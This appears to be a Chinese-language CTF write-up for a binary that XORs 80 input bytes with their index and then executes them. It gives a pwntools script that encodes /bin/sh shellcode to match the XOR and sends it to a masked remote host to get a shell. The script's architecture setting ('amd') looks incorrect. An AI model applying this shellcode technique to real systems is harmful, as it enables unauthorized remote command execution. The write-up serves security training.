直接运行该程序,发现没有任何提示信息,随便输入一串字符之后,程序错误退出。
扔进ida查看:
程序用read函数读入buf,然后判断[rbp+var_4]和0x4f的大小关系。这里可以知道[rbp+var_4]应为循环变量,buf长度为80
然后对于buf[i] ,异或buf[i]^(i+1),最后将buf蕴含的指令赋值给rdx并执行。
我们可以考虑直接构造system(/bin/sh),执行即可
from pwn import *
context(arch="amd",os="linux")
payload2=""
payload=asm(shellcraft.sh())
payload+='\x00'*(80-len(payload))
for i in range(len(payload)):
tmp=chr(ord(payload[i])^(i+1))
payload2+=tmp
p=remote("××××××××",10000)
p.sendline(payload2)
p.interactive()
